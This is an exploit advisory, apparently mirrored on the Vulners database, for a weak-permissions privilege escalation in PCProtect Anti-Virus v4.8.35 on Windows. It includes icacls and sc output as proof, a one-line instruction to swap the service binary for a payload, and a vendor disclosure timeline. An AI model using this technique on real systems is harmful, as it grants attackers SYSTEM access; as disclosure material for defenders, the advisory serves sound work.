Vulners
Lucene search
PCProtect 4 8.35 Privilege Escalation
`# Exploit Title : PCProtect v4.8.35 - Weak File Premissions Privilege Escalation
# Date : 09/11/2018
# Exploit Author : Hashim Jawad - @ihack4falafel
# Vendor Homepage : https://www.pcprotect.com/
# Vulnerable Software: https://www.pcprotect.com/download
# Tested on : Windows 7 Enterprise SP1 (x64)
Description:
============
PCProtect Anti-Virus v4.8.35 installs by default to "C:\Program Files (x86)\PCProtect" with very weak folder permissions granting any user full permission "Everyone: (F)" to the contents of the directory and it's subfolders. In addition, the program installs a service called "SecurityService" which runs as "Local system account", this will allow any user to escalate privileges to "NT AUTHORITY\SYSTEM" by substituting the service's binary with malicious one.
Proof:
======
C:\Users\IEUser>icacls "c:\Program Files (x86)\PCProtect"
c:\Program Files (x86)\PCProtect BUILTIN\Users:(OI)(CI)(F)
Everyone:(OI)(CI)(F)
NT SERVICE\TrustedInstaller:(I)(F)
NT SERVICE\TrustedInstaller:(I)(CI)(IO)(F)
NT AUTHORITY\SYSTEM:(I)(F)
NT AUTHORITY\SYSTEM:(I)(OI)(CI)(IO)(F)
BUILTIN\Administrators:(I)(F)
BUILTIN\Administrators:(I)(OI)(CI)(IO)(F)
BUILTIN\Users:(I)(RX)
BUILTIN\Users:(I)(OI)(CI)(IO)(GR,GE)
CREATOR OWNER:(I)(OI)(CI)(IO)(F)
Successfully processed 1 files; Failed processing 0 files
C:\Users\IEUser>sc qc SecurityService
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: SecurityService
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : "C:\Program Files (x86)\PCProtect\SecurityService.exe"
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : PC Security Management Service
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
C:\Users\IEUser>icacls "C:\Program Files (x86)\PCProtect\SecurityService.exe"
C:\Program Files (x86)\PCProtect\SecurityService.exe BUILTIN\Users:(I)(F)
Everyone:(I)(F)
NT AUTHORITY\SYSTEM:(I)(F)
BUILTIN\Administrators:(I)(F)
Successfully processed 1 files; Failed processing 0 files
C:\Users\IEUser>
Exploit:
========
Simply replace "SecurityService.exe" with your preferred payload and wait for execution upon reboot.
# Disclosure Timeline:
# ====================
# 09-12-18: Contacted vendor
# 09-13-18: Vendor responded requesting more information
# 09-13-18: Required information sent and requested to get me in touch with product security team
# 09-14-18: Vendor replied stating that I'm free account user thus suggested checking their Help Center
# 09-15-18: Contacted vendor again and explained this not support request rather security vulnerability and will be published in week time unless they request otherwise
# 09-16-18: Vendor responded that a ticket has been created and forwarded to the development team
# 09-21-18: Requested an update from vendor, no response
# 09-27-18: Vulnerability published
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
27 Sep 2018 00:00Current
0.3Low risk
Vulners AI Score0.3